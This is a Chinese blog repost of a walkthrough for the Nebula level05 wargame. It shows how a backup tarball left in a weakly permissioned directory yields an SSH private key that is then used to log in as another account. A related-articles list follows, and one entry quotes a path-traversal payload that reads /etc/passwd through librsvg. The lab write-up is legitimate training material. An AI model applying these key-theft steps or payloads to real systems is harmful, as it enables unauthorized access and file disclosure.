i春秋 - Exploit-Exercises: Nebula - level05

2023-12-26 03:40
文章标签 nebula exploit 春秋 exercises level05

本文主要是介绍i春秋 - Exploit-Exercises: Nebula - level05,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

About

Check the flag05 home directory. You are looking for weak directory permissions
Nebula官网

思路

进去看看

cd /home/flag05/
ll

发现一个其他人可执行的.backup目录

cd .backup/
ll

看到其他人可读的backup-19072011.tgz
复制到/tmp解压

cp backup-19072011.tgz /tmp/
cd /tmp/
tar -xvf backup-19072011.tgz

看到了备份的公私钥,所以应该可以凭借这些密钥ssh免密码登录flag05账户

cp -r .ssh/ ~/
ssh flag05@localhost
yes
cat flag

flag

这篇关于i春秋 - Exploit-Exercises: Nebula - level05的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/537978

相关文章

MATH36022 Numerical Analysis 2 Approximation of Functions – Week 3 Exercises

MATH36022 Numerical Analysis 2 Approximation of Functions – Week 3 Exercises

Show that the Chebyshev polynomials are orthogonal on ( − 1 , 1 ) (−1, 1) (−1,1) with respect to the weight function ( 1 − x 2 ) − 1 / 2 (1 − x^2)^{−1/2} (1−x2)−1/2. Ans: T n ( x ) = cos ⁡ ( n arcc
阅读更多...
linux安装nebula

linux安装nebula

1. nebula前置条件 $ yum update$ yum install -y make \m4 \git \wget \unzip \xz \readline-devel \ncurses-devel \zlib-devel \gcc \gcc-c++ \cmake \gettext \curl \redhat-lsb-core \bzip2 2.下载rpm https://neb
阅读更多...
MATH36022 Numerical Analysis 2 Approximation of Functions – Week 2 Exercises

MATH36022 Numerical Analysis 2 Approximation of Functions – Week 2 Exercises

Attempt these exercises in advance of the tutorial in Week 3 Find the best L ∞ L_\infin L∞​ approximation to f ( x ) = x n + 1 + ∑ k = 0 n a k x k f (x) = x^{n+1} + \sum_{k=0}^na_kx^k f(x)=xn+1+∑k=
阅读更多...
春秋云境-Brute4Road 【详细解析】

春秋云境-Brute4Road 【详细解析】

靶标介绍: Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。 内网地址Host or FQDN简要描述172.22.2.7外网 Redis 服务器172.22.2.18UBUNTU-W
阅读更多...
【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记

【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记

目录 ①fscan扫mssql账密,MDUT拿shell ②sweetpotato提权,cs拿shell ③John用户进程注入,读共享文件 ④fscan扫内网,frp内网穿透 ⑤喷洒密码,修改密码 ⑥RDP远程桌面连接 ⑦映像劫持提权 ⑧不出网转发上线CS ⑨PTH ①fscan扫mssql账密,MDUT拿shell GitHub - SafeGrocery
阅读更多...
training exercises

training exercises

List of weight training exercises
阅读更多...
Upper Back Exercises

Upper Back Exercises

http://www.upperbackpains.net/exercises-to-prevent-relief-back-pain.html 1. push-ups,wall push-ups. 2. raise your hands.
阅读更多...
【春秋云镜】CVE-2023-38633在librsvg <2.56.3版本中存在XXE漏洞

【春秋云镜】CVE-2023-38633在librsvg <2.56.3版本中存在XXE漏洞

1.靶标介绍 一个在 librsvg 2.56.3 之前版本中 URL 解码器的目录遍历问题,可以被本地或远程攻击者用来泄露文件(在预期区域之外的本地文件系统上),例如通过在 xi:include 元素中使用 href=“.?../…/…/…/…/…/…/…/…/…/etc/passwd” 来读取结果。 访问靶场: 2.漏洞分析 CVE-2023-38633主要是利用XXE漏洞,访问敏感
阅读更多...
【索引】Fundamental Data Structures:Exercises: Advanced

【索引】Fundamental Data Structures:Exercises: Advanced

AOAPC I: Beginning Algorithm Contests -- Training Guide (Rujia Liu) Chapter 3. Data Structures::Fundamental Data Structures:Exercises: Advanced 1517 - Tracking RFIDs 1517 - Tracking
阅读更多...
【索引】Chapter 1. Algorithm Design_General Problem Solving Techniques_Exercises: Beginner

【索引】Chapter 1. Algorithm Design_General Problem Solving Techniques_Exercises: Beginner

链接:http://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&category=457 有三题是挂掉了 Root ::  AOAPC I: Beginning Algorithm Contests -- Training Guide (Rujia Liu) ::  Chapter 1. Algorithm
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2